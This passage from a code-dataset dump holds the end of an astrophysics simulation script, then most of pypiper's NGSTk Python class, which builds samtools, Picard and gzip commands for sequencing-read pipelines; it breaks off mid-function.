k1.long_asc(), k1.arg_peri(), time.time()-time3body, file=output_file)\n\t\t\toutput_file.flush()\n\n\toutput_file.close()\n\n\treturn 0","repo_name":"RZCas/binary-evolution-in-a-cluster","sub_path":"binary_evolution_with_flybys.py","file_name":"binary_evolution_with_flybys.py","file_ext":"py","file_size_in_byte":30312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18843752867","text":"\"\"\" Broadly applicable NGS processing/analysis functionality \"\"\"\n\nimport errno\nimport os\nimport re\nimport subprocess\n\nfrom attmap import AttMapEcho\nfrom yacman import load_yaml\n\nfrom .exceptions import UnsupportedFiletypeException\nfrom .utils import is_fastq, is_gzipped_fastq, is_sam_or_bam\n\n\nclass NGSTk(AttMapEcho):\n \"\"\"\n Class to hold functions to build command strings used during pipeline runs.\n Object can be instantiated with a string of a path to a yaml `pipeline config file`.\n Since NGSTk inherits from `AttMapEcho`, the passed config file and its elements\n will be accessible through the NGSTk object as attributes under `config` (e.g.\n `NGSTk.tools.java`). In case no `config_file` argument is passed, all commands will\n be returned assuming the tool is in the user's $PATH.\n\n :param str config_file: Path to pipeline yaml config file (optional).\n :param pypiper.PipelineManager pm: A PipelineManager with which to associate this toolkit instance;\n that is, essentially a source from which to grab paths to tools,\n resources, etc.\n\n :Example:\n\n from pypiper.ngstk import NGSTk as tk\n tk = NGSTk()\n tk.samtools_index(\"sample.bam\")\n # returns: samtools index sample.bam\n\n # Using a configuration file (custom executable location):\n from pypiper.ngstk import NGSTk\n tk = NGSTk(\"pipeline_config_file.yaml\")\n tk.samtools_index(\"sample.bam\")\n # returns: /home/.local/samtools/bin/samtools index sample.bam\n\n \"\"\"\n\n def __init__(self, config_file=None, pm=None):\n # parse yaml into the project's attributes\n # self.add_entries(**config)\n super(NGSTk, self).__init__(\n None if config_file is None else load_yaml(config_file)\n )\n\n # Keep a link to the pipeline manager, if one is provided.\n # if None is provided, instantiate \"tools\" and \"parameters\" with empty AttMaps\n # this allows the usage of the same code for a command with and without using a pipeline manager\n if pm is not None:\n self.pm = pm\n if hasattr(pm.config, \"tools\"):\n self.tools = self.pm.config.tools\n else:\n self.tools = AttMapEcho()\n if hasattr(pm.config, \"parameters\"):\n self.parameters = self.pm.config.parameters\n else:\n self.parameters = AttMapEcho()\n else:\n self.tools = AttMapEcho()\n self.parameters = AttMapEcho()\n\n # If pigz is available, use that. Otherwise, default to gzip.\n if (\n hasattr(self.pm, \"cores\")\n and self.pm.cores > 1\n and self.check_command(\"pigz\")\n ):\n self.ziptool_cmd = \"pigz -f -p {}\".format(self.pm.cores)\n else:\n self.ziptool_cmd = \"gzip -f\"\n\n def _ensure_folders(self, *paths):\n \"\"\"\n Ensure that paths to folder(s) exist.\n\n Some command-line tools will not attempt to create folder(s) needed\n for output path to exist. They instead assume that they already are\n present and will fail if that assumption does not hold.\n\n :param Iterable[str] paths: Collection of path for which\n \"\"\"\n for p in paths:\n # Only provide assurance for absolute paths.\n if not p or not os.path.isabs(p):\n continue\n # See if what we're assuring is file- or folder-like.\n fpath, fname = os.path.split(p)\n base, ext = os.path.splitext(fname)\n # If there's no extension, ensure that we have the whole path.\n # Otherwise, just ensure that we have path to file's folder.\n self.make_dir(fpath if ext else p)\n\n @property\n def ziptool(self):\n \"\"\"\n Returns the command to use for compressing/decompressing.\n\n :return str: Either 'gzip' or 'pigz' if installed and multiple cores\n \"\"\"\n return self.ziptool_cmd\n\n def make_dir(self, path):\n \"\"\"\n Forge path to directory, creating intermediates as needed.\n\n :param str path: Path to create.\n \"\"\"\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n def make_sure_path_exists(self, path):\n \"\"\"Alias for make_dir\"\"\"\n self.make_dir(path)\n\n # Borrowed from looper\n def check_command(self, command):\n \"\"\"\n Check if command can be called.\n \"\"\"\n\n # Use `command` to see if command is callable, store exit code\n code = os.system(\n \"command -v {0} >/dev/null 2>&1 || {{ exit 1; }}\".format(command)\n )\n\n # If exit code is not 0, report which command failed and return False, else return True\n if code != 0:\n print(\"Command is not callable: {0}\".format(command))\n return False\n else:\n return True\n\n def get_file_size(self, filenames):\n \"\"\"\n Get size of all files in string (space-separated) in megabytes (Mb).\n\n :param str filenames: a space-separated string of filenames\n \"\"\"\n # use (1024 ** 3) for gigabytes\n # equivalent to: stat -Lc '%s' filename\n\n # If given a list, recurse through it.\n if type(filenames) is list:\n return sum([self.get_file_size(filename) for filename in filenames])\n\n return round(\n sum([float(os.stat(f).st_size) for f in filenames.split(\" \")])\n / (1024**2),\n 4,\n )\n\n def mark_duplicates(\n self, aligned_file, out_file, metrics_file, remove_duplicates=\"True\"\n ):\n cmd = self.tools.java\n if self.pm.javamem: # If a memory restriction exists.\n cmd += \" -Xmx\" + self.pm.javamem\n cmd += \" -jar \" + self.tools.picard + \" MarkDuplicates\"\n cmd += \" INPUT=\" + aligned_file\n cmd += \" OUTPUT=\" + out_file\n cmd += \" METRICS_FILE=\" + metrics_file\n cmd += \" REMOVE_DUPLICATES=\" + remove_duplicates\n return cmd\n\n def bam2fastq(\n self, input_bam, output_fastq, output_fastq2=None, unpaired_fastq=None\n ):\n \"\"\"\n Create command to convert BAM(s) to FASTQ(s).\n\n :param str input_bam: Path to sequencing reads file to convert\n :param output_fastq: Path to FASTQ to write\n :param output_fastq2: Path to (R2) FASTQ to write\n :param unpaired_fastq: Path to unpaired FASTQ to write\n :return str: Command to convert BAM(s) to FASTQ(s)\n \"\"\"\n self._ensure_folders(output_fastq, output_fastq2, unpaired_fastq)\n cmd = self.tools.java + \" -Xmx\" + self.pm.javamem\n cmd += \" -jar \" + self.tools.picard + \" SamToFastq\"\n cmd += \" INPUT={0}\".format(input_bam)\n cmd += \" FASTQ={0}\".format(output_fastq)\n if output_fastq2 is not None and unpaired_fastq is not None:\n cmd += \" SECOND_END_FASTQ={0}\".format(output_fastq2)\n cmd += \" UNPAIRED_FASTQ={0}\".format(unpaired_fastq)\n return cmd\n\n def bam_to_fastq(self, bam_file, out_fastq_pre, paired_end):\n \"\"\"\n Build command to convert BAM file to FASTQ file(s) (R1/R2).\n\n :param str bam_file: path to BAM file with sequencing reads\n :param str out_fastq_pre: path prefix for output FASTQ file(s)\n :param bool paired_end: whether the given file contains paired-end\n or single-end sequencing reads\n :return str: file conversion command, ready to run\n \"\"\"\n self.make_sure_path_exists(os.path.dirname(out_fastq_pre))\n cmd = self.tools.java + \" -Xmx\" + self.pm.javamem\n cmd += \" -jar \" + self.tools.picard + \" SamToFastq\"\n cmd += \" I=\" + bam_file\n cmd += \" F=\" + out_fastq_pre + \"_R1.fastq\"\n if paired_end:\n cmd += \" F2=\" + out_fastq_pre + \"_R2.fastq\"\n cmd += \" INCLUDE_NON_PF_READS=true\"\n cmd += \" QUIET=true\"\n cmd += \" VERBOSITY=ERROR\"\n cmd += \" VALIDATION_STRINGENCY=SILENT\"\n return cmd\n\n def bam_to_fastq_awk(self, bam_file, out_fastq_pre, paired_end, zipmode=False):\n \"\"\"\n This converts bam file to fastq files, but using awk. As of 2016, this is much faster\n than the standard way of doing this using Picard, and also much faster than the\n bedtools implementation as well; however, it does no sanity checks and assumes the reads\n (for paired data) are all paired (no singletons), in the correct order.\n :param bool zipmode: Should the output be zipped?\n \"\"\"\n self.make_sure_path_exists(os.path.dirname(out_fastq_pre))\n fq1 = out_fastq_pre + \"_R1.fastq\"\n fq2 = out_fastq_pre + \"_R2.fastq\"\n\n if zipmode:\n fq1 = fq1 + \".gz\"\n fq2 = fq2 + \".gz\"\n fq1_target = ' | \"' + self.ziptool + \" -c > \" + fq1 + '\"'\n fq2_target = ' | \"' + self.ziptool + \" -c > \" + fq2 + '\"'\n else:\n fq1_target = ' > \"' + fq1 + '\"'\n fq2_target = ' > \"' + fq2 + '\"'\n\n if paired_end:\n cmd = self.tools.samtools + \" view \" + bam_file + \" | awk '\"\n cmd += r'{ if (NR%2==1) print \"@\"$1\"/1\\n\"$10\"\\n+\\n\"$11' + fq1_target + \";\"\n cmd += r' else print \"@\"$1\"/2\\n\"$10\"\\n+\\n\"$11' + fq2_target + \"; }\"\n cmd += \"'\" # end the awk command\n else:\n fq2 = None\n cmd = self.tools.samtools + \" view \" + bam_file + \" | awk '\"\n cmd += r'{ print \"@\"$1\"\\n\"$10\"\\n+\\n\"$11' + fq1_target + \"; }\"\n cmd += \"'\"\n return cmd, fq1, fq2\n\n def bam_to_fastq_bedtools(self, bam_file, out_fastq_pre, paired_end):\n \"\"\"\n Converts bam to fastq; A version using bedtools\n \"\"\"\n self.make_sure_path_exists(os.path.dirname(out_fastq_pre))\n fq1 = out_fastq_pre + \"_R1.fastq\"\n fq2 = None\n cmd = (\n self.tools.bedtools\n + \" bamtofastq -i \"\n + bam_file\n + \" -fq \"\n + fq1\n + \".fastq\"\n )\n if paired_end:\n fq2 = out_fastq_pre + \"_R2.fastq\"\n cmd += \" -fq2 \" + fq2\n\n return cmd, fq1, fq2\n\n def get_input_ext(self, input_file):\n \"\"\"\n Get the extension of the input_file. Assumes you're using either\n .bam or .fastq/.fq or .fastq.gz/.fq.gz.\n \"\"\"\n if input_file.endswith(\".bam\"):\n input_ext = \".bam\"\n elif input_file.endswith(\".fastq.gz\") or input_file.endswith(\".fq.gz\"):\n input_ext = \".fastq.gz\"\n elif input_file.endswith(\".fastq\") or input_file.endswith(\".fq\"):\n input_ext = \".fastq\"\n else:\n errmsg = (\n \"'{}'; this pipeline can only deal with .bam, .fastq, \"\n \"or .fastq.gz files\".format(input_file)\n )\n raise UnsupportedFiletypeException(errmsg)\n return input_ext\n\n def merge_or_link(self, input_args, raw_folder, local_base=\"sample\"):\n \"\"\"\n Standardizes various input possibilities by converting either .bam,\n .fastq, or .fastq.gz files into a local file; merging those if multiple\n files given.\n\n :param list input_args: This is a list of arguments, each one is a\n class of inputs (which can in turn be a string or a list).\n Typically, input_args is a list with 2 elements: first a list of\n read1 files; second an (optional!) list of read2 files.\n :param str raw_folder: Name/path of folder for the merge/link.\n :param str local_base: Usually the sample name. This (plus file\n extension) will be the name of the local file linked (or merged)\n by this function.\n \"\"\"\n self.make_sure_path_exists(raw_folder)\n\n if not isinstance(input_args, list):\n raise Exception(\"Input must be a list\")\n\n if any(isinstance(i, list) for i in input_args):\n # We have a list of lists. Process each individually.\n local_input_files = list()\n n_input_files = len(list(filter(bool, input_args)))\n print(\"Number of input file sets: \" + str(n_input_files))\n\n for input_i, input_arg in enumerate(input_args):\n # Count how many non-null items there are in the list;\n # we only append _R1 (etc.) if there are multiple input files.\n if n_input_files > 1:\n local_base_extended = local_base + \"_R\" + str(input_i + 1)\n else:\n local_base_extended = local_base\n if input_arg:\n out = self.merge_or_link(input_arg, raw_folder, local_base_extended)\n\n print(\"Local input file: '{}'\".format(out))\n # Make sure file exists:\n if not os.path.isfile(out):\n print(\"Not a file: '{}'\".format(out))\n\n local_input_files.append(out)\n\n return local_input_files\n\n else:\n # We have a list of individual arguments. Merge them.\n\n if len(input_args) == 1:\n # Only one argument in this list. A single input file; we just link\n # it, regardless of file type:\n # Pull the value out of the list\n input_arg = input_args[0]\n input_ext = self.get_input_ext(input_arg)\n\n # Convert to absolute path\n if not os.path.isabs(input_arg):\n input_arg = os.path.abspath(input_arg)\n\n # Link it to into the raw folder\n local_input_abs = os.path.join(raw_folder, local_base + input_ext)\n self.pm.run(\n \"ln -sf \" + input_arg + \" \" + local_input_abs,\n target=local_input_abs,\n shell=True,\n )\n # return the local (linked) filename absolute path\n return local_input_abs\n\n else:\n # Otherwise, there are multiple inputs.\n # If more than 1 input file is given, then these are to be merged\n # if they are in bam format.\n if all([self.get_input_ext(x) == \".bam\" for x in input_args]):\n sample_merged = local_base + \".merged.bam\"\n output_merge = os.path.join(raw_folder, sample_merged)\n cmd = self.merge_bams_samtools(input_args, output_merge)\n self.pm.debug(\"cmd: {}\".format(cmd))\n self.pm.run(cmd, output_merge)\n cmd2 = self.validate_bam(output_merge)\n self.pm.run(cmd, output_merge, nofail=True)\n return output_merge\n\n # if multiple fastq\n if all([self.get_input_ext(x) == \".fastq.gz\" for x in input_args]):\n sample_merged_gz = local_base + \".merged.fastq.gz\"\n output_merge_gz = os.path.join(raw_folder, sample_merged_gz)\n # cmd1 = self.ziptool + \"-d -c \" + \" \".join(input_args) + \" > \" + output_merge\n # cmd2 = self.ziptool + \" \" + output_merge\n # self.pm.run([cmd1, cmd2], output_merge_gz)\n # you can save yourself the decompression/recompression:\n cmd = \"cat \" + \" \".join(input_args) + \" > \" + output_merge_gz\n self.pm.run(cmd, output_merge_gz)\n return output_merge_gz\n\n if all([self.get_input_ext(x) == \".fastq\" for x in input_args]):\n sample_merged = local_base + \".merged.fastq\"\n output_merge = os.path.join(raw_folder, sample_merged)\n cmd = \"cat \" + \" \".join(input_args) + \" > \" + output_merge\n self.pm.run(cmd, output_merge)\n return output_merge\n\n # At this point, we don't recognize the input file types or they\n # do not match.\n raise NotImplementedError(\n \"Input files must be of the same type, and can only \"\n \"merge bam or fastq.\"\n )\n\n def input_to_fastq(\n self,\n input_file,\n sample_name,\n paired_end,\n fastq_folder,\n output_file=None,\n multiclass=False,\n zipmode=False,\n ):\n \"\"\"\n Builds a command to convert input file to fastq, for various inputs.\n\n Takes either .bam, .fastq.gz, or .fastq input and returns\n commands that will create the .fastq file, regardless of input type.\n This is useful to made your pipeline easily accept any of these input\n types seamlessly, standardizing you to fastq which is still the\n most common format for adapter trimmers, etc. You can specify you want\n output either zipped or not.\n\n Commands will place the output fastq file in given `fastq_folder`.\n\n :param str input_file: filename of input you want to convert to fastq\n :param bool multiclass: Are both read1 and read2 included in a single\n file? User should not need to set this; it will be inferred and used\n in recursive calls, based on number files, and the paired_end arg.\n :param bool zipmode: Should the output be .fastq.gz? Otherwise, just fastq\n :return str: A command (to be run with PipelineManager) that will ensure\n your fastq file exists.\n \"\"\"\n\n fastq_prefix = os.path.join(fastq_folder, sample_name)\n self.make_sure_path_exists(fastq_folder)\n\n # this expects a list; if it gets a string, wrap it in a list.\n if type(input_file) != list:\n input_file = [input_file]\n\n # If multiple files were provided, recurse on each file individually\n if len(input_file) > 1:\n cmd = []\n output_file = []\n for in_i, in_arg in enumerate(input_file):\n output = fastq_prefix + \"_R\" + str(in_i + 1) + \".fastq\"\n result_cmd, uf, result_file = self.input_to_fastq(\n in_arg,\n sample_name,\n paired_end,\n fastq_folder,\n output,\n multiclass=True,\n zipmode=zipmode,\n )\n cmd.append(result_cmd)\n output_file.append(result_file)\n\n else:\n # There was only 1 input class.\n # Convert back into a string\n input_file = input_file[0]\n if not output_file:\n output_file = fastq_prefix + \"_R1.fastq\"\n if zipmode:\n output_file = output_file + \".gz\"\n\n input_ext = self.get_input_ext(input_file) # handles .fq or .fastq\n\n if input_ext == \".bam\":\n print(\"Found .bam file\")\n # cmd = self.bam_to_fastq(input_file, fastq_prefix, paired_end)\n cmd, fq1, fq2 = self.bam_to_fastq_awk(\n input_file, fastq_prefix, paired_end, zipmode\n )\n # pm.run(cmd, output_file, follow=check_fastq)\n if fq2:\n output_file = [fq1, fq2]\n else:\n output_file = fq1\n elif input_ext == \".fastq.gz\":\n print(\"Found .fastq.gz file\")\n if paired_end and not multiclass:\n if zipmode:\n raise NotImplementedError(\n \"Can't use zipmode on interleaved fastq data.\"\n )\n # For paired-end reads in one fastq file, we must split the\n # file into 2. The pipeline author will need to include this\n # python script in the scripts directory.\n # TODO: make this self-contained in pypiper. This is a rare\n # use case these days, as fastq files are almost never\n # interleaved anymore.\n script_path = os.path.join(self.tools.scripts_dir, \"fastq_split.py\")\n cmd = self.tools.python + \" -u \" + script_path\n cmd += \" -i \" + input_file\n cmd += \" -o \" + fastq_prefix\n # Must also return the set of output files\n output_file = [\n fastq_prefix + \"_R1.fastq\",\n fastq_prefix + \"_R2.fastq\",\n ]\n else:\n if zipmode:\n # we do nothing!\n cmd = \"ln -sf \" + input_file + \" \" + output_file\n print(\"Found .fq.gz file; no conversion necessary\")\n else:\n # For single-end reads, we just unzip the fastq.gz file.\n # or, paired-end reads that were already split.\n cmd = (\n self.ziptool + \" -d -c \" + input_file + \" > \" + output_file\n )\n # a non-shell version\n # cmd1 = \"gunzip --force \" + input_file\n # cmd2 = \"mv \" + os.path.splitext(input_file)[0] + \" \" + output_file\n # cmd = [cmd1, cmd2]\n elif input_ext == \".fastq\":\n if zipmode:\n cmd = self.ziptool + \" -c \" + input_file + \" > \" + output_file\n else:\n cmd = \"ln -sf \" + input_file + \" \" + output_file\n print(\"Found .fastq file; no conversion necessary\")\n\n return [cmd, fastq_prefix, output_file]\n\n def check_fastq(self, input_files, output_files, paired_end):\n \"\"\"\n Returns a follow sanity-check function to be run after a fastq conversion.\n Run following a command that will produce the fastq files.\n\n This function will make sure any input files have the same number of reads as the\n output files.\n \"\"\"\n\n # Define a temporary function which we will return, to be called by the\n # pipeline.\n # Must define default parameters here based on the parameters passed in. This locks\n # these values in place, so that the variables will be defined when this function\n # is called without parameters as a follow function by pm.run.\n\n # This is AFTER merge, so if there are multiple files it means the\n # files were split into read1/read2; therefore I must divide by number\n # of files for final reads.\n def temp_func(\n input_files=input_files, output_files=output_files, paired_end=paired_end\n ):\n if type(input_files) != list:\n input_files = [input_files]\n if type(output_files) != list:\n output_files = [output_files]\n\n n_input_files = len(list(filter(bool, input_files)))\n n_output_files = len(list(filter(bool, output_files)))\n\n total_reads = sum(\n [\n int(self.count_reads(input_file, paired_end))\n for input_file in input_files\n ]\n )\n raw_reads = int(total_reads / n_input_files)\n self.pm.pipestat.report(values={\"Raw_reads\": str(raw_reads)})\n\n total_fastq_reads = sum(\n [\n int(self.count_reads(output_file, paired_end))\n for output_file in output_files\n ]\n )\n fastq_reads = int(total_fastq_reads / n_output_files)\n\n self.pm.pipestat.report(values={\"Fastq_reads\": fastq_reads})\n input_ext = self.get_input_ext(input_files[0])\n # We can only assess pass filter reads in bam files with flags.\n if input_ext == \".bam\":\n num_failed_filter = sum(\n [int(self.count_fail_reads(f, paired_end)) for f in input_files]\n )\n pf_reads = int(raw_reads) - num_failed_filter\n self.pm.pipestat.report(values={\"PF_reads\": str(pf_reads)})\n if fastq_reads != int(raw_reads):\n raise Exception(\n \"Fastq conversion error? Number of input reads \"\n \"doesn't number of output reads.\"\n )\n\n return fastq_reads\n\n return temp_func\n\n def check_trim(\n self, trimmed_fastq, paired_end, trimmed_fastq_R2=None, fastqc_folder=None\n ):\n \"\"\"\n Build function to evaluate read trimming, and optionally run fastqc.\n\n This is useful to construct an argument for the 'follow' parameter of\n a PipelineManager's 'run' method.\n\n :param str trimmed_fastq: Path to trimmed reads file.\n :param bool paired_end: Whether the processing is being done with\n paired-end sequencing data.\n :param str trimmed_fastq_R2: Path to read 2 file for the paired-end case.\n :param str fastqc_folder: Path to folder within which to place fastqc\n output files; if unspecified, fastqc will not be run.\n :return callable: Function to evaluate read trimming and possibly run\n fastqc.\n \"\"\"\n\n def temp_func():\n print(\"Evaluating read trimming\")\n\n if paired_end and not trimmed_fastq_R2:\n print(\"WARNING: specified paired-end but no R2 file\")\n\n n_trim = float(self.count_reads(trimmed_fastq, paired_end))\n self.pm.pipestat.report(values={\"Trimmed_reads\": int(n_trim)})\n try:\n rr = float(self.pm.pipestat.retrieve(\"Raw_reads\"))\n except:\n print(\"Can't calculate trim loss rate without raw read result.\")\n else:\n self.pm.report_result(\n \"Trim_loss_rate\", round((rr - n_trim) * 100 / rr, 2)\n )\n\n # Also run a fastqc (if installed/requested)\n if fastqc_folder:\n if fastqc_folder and os.path.isabs(fastqc_folder):\n self.make_sure_path_exists(fastqc_folder)\n cmd = self.fastqc(trimmed_fastq, fastqc_folder)\n self.pm.run(cmd, lock_name=\"trimmed_fastqc\", nofail=True)\n fname, ext = os.path.splitext(os.path.basename(trimmed_fastq))\n fastqc_html = os.path.join(fastqc_folder, fname + \"_fastqc.html\")\n self.pm.pipestat.report(\n values={\n \"FastQC_report_R1\": {\n \"path\": fastqc_html,\n \"title\": \"FastQC report R1\",\n }\n }\n )\n\n if paired_end and trimmed_fastq_R2:\n cmd = self.fastqc(trimmed_fastq_R2, fastqc_folder)\n self.pm.run(cmd, lock_name=\"trimmed_fastqc_R2\", nofail=True)\n fname, ext = os.path.splitext(os.path.basename(trimmed_fastq_R2))\n fastqc_html = os.path.join(fastqc_folder, fname + \"_fastqc.html\")\n self.pm.pipestat.report(\n values={\n \"FastQC_report_R2\": {\n \"path\": fastqc_html,\n \"title\": \"FastQC report R2\",\n }\n }\n )\n\n return temp_func\n\n def validate_bam(self, input_bam):\n \"\"\"\n Wrapper for Picard's ValidateSamFile.\n\n :param str input_bam: Path to file to validate.\n :return str: Command to run for the validation.\n \"\"\"\n cmd = self.tools.java + \" -Xmx\" + self.pm.javamem\n cmd += \" -jar \" + self.tools.picard + \" ValidateSamFile\"\n cmd += \" INPUT=\" + input_bam\n return cmd\n\n def merge_bams(self, input_bams, merged_bam, in_sorted=\"TRUE\", tmp_dir=None):\n \"\"\"\n Combine multiple files into one.\n\n The tmp_dir parameter is important because on poorly configured\n systems, the default can sometimes fill up.\n\n :param Iterable[str] input_bams: Paths to files to combine\n :param str merged_bam: Path to which to write combined result.\n :param bool | str in_sorted: Whether the inputs are sorted\n :param str tmp_dir: Path to temporary directory.\n \"\"\"\n if not len(input_bams) > 1:\n print(\"No merge required\")\n return 0\n\n outdir, _ = os.path.split(merged_bam)\n if outdir and not os.path.exists(outdir):\n print(\"Creating path to merge file's folder: '{}'\".format(outdir))\n os.makedirs(outdir)\n\n # Handle more intuitive boolean argument.\n if in_sorted in [False, True]:\n in_sorted = \"TRUE\" if in_sorted else \"FALSE\"\n\n input_string = \" INPUT=\" + \" INPUT=\".join(input_bams)\n cmd = self.tools.java + \" -Xmx\" + self.pm.javamem\n cmd += \" -jar \" + self.tools.picard + \" MergeSamFiles\"\n cmd += input_string\n cmd += \" OUTPUT=\" + merged_bam\n cmd += \" ASSUME_SORTED=\" + str(in_sorted)\n cmd += \" CREATE_INDEX=TRUE\"\n cmd += \" VALIDATION_STRINGENCY=SILENT\"\n if tmp_dir:\n cmd += \" TMP_DIR=\" + tmp_dir\n\n return cmd\n\n def merge_bams_samtools(self, input_bams, merged_bam):\n cmd = self.tools.samtools + \" merge -f \"\n cmd += \" -@ \" + str(self.pm.cores)\n cmd += \" \" + merged_bam + \" \"\n cmd += \" \".join(input_bams)\n return cmd\n\n def merge_fastq(self, inputs, output, run=False, remove_inputs=False):\n \"\"\"\n Merge FASTQ files (zipped or not) into one.\n\n :param Iterable[str] inputs: Collection of paths to files to merge.\n :param str output: Path to single output file.\n :param bool run: Whether to run the command.\n :param bool remove_inputs: Whether to keep the original files.\n :return NoneType | str: Null if running the command, otherwise the\n command itself\n :raise ValueError: Raise ValueError if the call is such that\n inputs are to be deleted but command is not run.\n \"\"\"\n if remove_inputs and not run:\n raise ValueError(\"Can't delete files if command isn't run\")\n cmd = \"cat {} > {}\".format(\" \".join(inputs), output)\n if run:\n subprocess.check_call(cmd.split(), shell=True)\n if remove_inputs:\n cmd = \"rm {}\".format(\" \".join(inputs))\n subprocess.check_call(cmd.split(), shell=True)\n else:\n return cmd\n\n def count_lines(self, file_name):\n \"\"\"\n Uses the command-line utility wc to count the number of lines in a file. For MacOS, must strip leading whitespace from wc.\n\n :param str file_name: name of file whose lines are to be counted\n \"\"\"\n x = subprocess.check_output(\n \"wc -l \" + file_name + \" | sed -E 's/^[[:space:]]+//' | cut -f1 -d' '\",\n shell=True,\n )\n return x.decode().strip()\n\n def count_lines_zip(self, file_name):\n \"\"\"\n Uses the command-line utility wc to count the number of lines in a file. For MacOS, must strip leading whitespace from wc.\n For compressed files.\n :param file: file_name\n \"\"\"\n x = subprocess.check_output(\n self.ziptool\n + \" -d -c \"\n + file_name\n + \" | wc -l | sed -E 's/^[[:space:]]+//' | cut -f1 -d' '\",\n shell=True,\n )\n return x.decode().strip()\n\n def get_chrs_from_bam(self, file_name):\n \"\"\"\n Uses samtools to grab the chromosomes from the header that are contained\n in this bam file.\n \"\"\"\n x = subprocess.check_output(\n self.tools.samtools\n + \" view -H \"\n + file_name\n + \" | grep '^@SQ' | cut -f2| sed s'/SN://'\",\n shell=True,\n )\n # Chromosomes will be separated by newlines; split into list to return\n return x.decode().split()\n\n ###################################\n # Read counting functions\n ###################################\n # In these functions, A paired-end read, with 2 sequences, counts as a two reads\n\n def count_unique_reads(self, file_name, paired_end):\n \"\"\"\n Sometimes alignment software puts multiple locations for a single read; if you just count\n those reads, you will get an inaccurate count. This is _not_ the same as multimapping reads,\n which may or may not be actually duplicated in the bam file (depending on the alignment\n software).\n This function counts each read only once.\n This accounts for paired end or not for free because pairs have the same read name.\n In this function, a paired-end read would count as 2 reads.\n \"\"\"\n if file_name.endswith(\"sam\"):\n param = \"-S\"\n if file_name.endswith(\"bam\"):\n param = \"\"\n if paired_end:\n r1 = self.samtools_view(\n file_name,\n param=param + \" -f64\",\n postpend=\" | cut -f1 | sort -k1,1 -u | wc -l | sed -E 's/^[[:space:]]+//'\",\n )\n r2 = self.samtools_view(\n file_name,\n param=param + \" -f128\",\n postpend=\" | cut -f1 | sort -k1,1 -u | wc -l | sed -E 's/^[[:space:]]+//'\",\n )\n else:\n r1 = self.samtools_view(\n file_name,\n param=param + \"\",\n postpend=\" | cut -f1 | sort -k1,1 -u | wc -l | sed -E 's/^[[:space:]]+//'\",\n )\n r2 = 0\n return int(r1) + int(r2)\n\n def count_unique_mapped_reads(self, file_name, paired_end):\n \"\"\"\n For a bam or sam file with paired or or single-end reads, returns the\n number of mapped reads, counting each read only once, even if it appears\n mapped at multiple locations.\n\n :param str file_name: name of reads file\n :param bool paired_end: True/False paired end data\n :return int: Number of uniquely mapped reads.\n \"\"\"\n\n _, ext = os.path.splitext(file_name)\n ext = ext.lower()\n\n if ext == \".sam\":\n param = \"-S -F4\"\n elif ext == \".bam\":\n param = \"-F4\"\n else:\n raise ValueError(\"Not a SAM or BAM: '{}'\".format(file_name))\n\n if paired_end:\n r1 = self.samtools_view(\n file_name,\n param=param + \" -f64\",\n postpend=\" | cut -f1 | sort -k1,1 -u | wc -l | sed -E 's/^[[:space:]]+//'\",\n )\n r2 = self.samtools_view(\n file_name,\n param=param + \" -f128\",\n postpend=\" | cut -f1 | sort -k1,1 -u | wc -l | sed -E 's/^[[:space:]]+//'\",\n )\n else:\n r1 = self.samtools_view(\n file_name,\n param=param + \"\",\n postpend=\" | cut -f1 | sort -k1,1 -u | wc -l | sed -E 's/^[[:space:]]+//'\",\n )\n r2 = 0\n\n return int(r1) + int(r2)\n\n def count_flag_reads(self, file_name, flag, paired_end):\n \"\"\"\n Counts the number of reads with the specified flag.\n\n :param str file_name: name of reads file\n :param str flag: sam flag value to be read\n :param bool paired_end: This parameter is ignored; samtools automatically correctly responds depending\n on the data in the bamfile. We leave the option here just for consistency, since all the other\n counting functions require the parameter. This makes it easier to swap counting functions during\n pipeline development.\n \"\"\"\n\n param = \" -c -f\" + str(flag)\n if file_name.endswith(\"sam\"):\n param += \" -S\"\n return self.samtools_view(file_name, param=param)\n\n def count_multimapping_reads(self, file_name, paired_end):\n \"\"\"\n Counts the number of reads that mapped to multiple locations. Warning:\n currently, if the alignment software includes the reads at multiple locations, this function\n will count those more than once. This function is for software that randomly assigns,\n but flags reads as multimappers.\n\n :param str file_name: name of reads file\n :param paired_end: This parameter is ignored; samtools automatically correctly responds depending\n on the data in the bamfile. We leave the option here just for consistency, since all the other\n counting functions require the parameter. This makes it easier to swap counting functions during\n pipeline development.\n \"\"\"\n return int(self.count_flag_reads(file_name, 256, paired_end))\n\n def count_uniquelymapping_reads(self, file_name, paired_end):\n \"\"\"\n Counts the number of reads that mapped to a unique position.\n\n :param str file_name: name of reads file\n :param bool paired_end: This parameter is ignored.\n \"\"\"\n param = \" -c -F256\"\n if file_name.endswith(\"sam\"):\n param += \" -S\"\n return self.samtools_view(file_name, param=param)\n\n def count_fail_reads(self, file_name, paired_end):\n \"\"\"\n Counts the number of reads that failed platform/vendor quality checks.\n :param paired_end: This parameter is ignored; samtools automatically correctly responds depending\n on the data in the bamfile. We leave the option here just for consistency, since all the other\n counting functions require the parameter. This makes it easier to swap counting functions during\n pipeline development.\n \"\"\"\n return int(self.count_flag_reads(file_name, 512, paired_end))\n\n def samtools_view(self, file_name, param, postpend=\"\"):\n \"\"\"\n Run samtools view, with flexible parameters and post-processing.\n\n This is used internally to implement the various count_reads functions.\n\n :param str file_name: file_name\n :param str param: String of parameters to pass to samtools view\n :param str postpend: String to append to the samtools command;\n useful to add cut, sort, wc operations to the samtools view output.\n \"\"\"\n cmd = \"{} view {} {} {}\".format(self.tools.samtools, param, file_name, postpend)\n # in python 3, check_output returns a byte string which causes issues.\n # with python 3.6 we could use argument: \"encoding='UTF-8'\"\"\n return subprocess.check_output(cmd, shell=True).decode().strip()\n\n def count_reads(self, file_name, paired_end):\n \"\"\"\n Count reads in a file.\n\n Paired-end reads count as 2 in this function.\n For paired-end reads, this function assumes that the reads are split\n into 2 files, so it divides line count by 2 instead of 4.\n This will thus give an incorrect result if your paired-end fastq files\n are in only a single file (you must divide by 2 again).\n\n :param str file_name: Name/path of file whose reads are to be counted.\n :param bool paired_end: Whether the file contains paired-end reads.\n \"\"\"\n\n _, ext = os.path.splitext(file_name)\n if not (is_sam_or_bam(file_name) or is_fastq(file_name)):\n # TODO: make this an exception and force caller to handle that\n # rather than relying on knowledge of possibility of negative value.\n return -1\n\n if is_sam_or_bam(file_name):\n param_text = \"-c\" if ext == \".bam\" else \"-c -S\"\n return self.samtools_view(file_name, param=param_text)\n else:\n num_lines = (\n self.count_lines_zip(file_name)\n if is_gzipped_fastq(file_name)\n 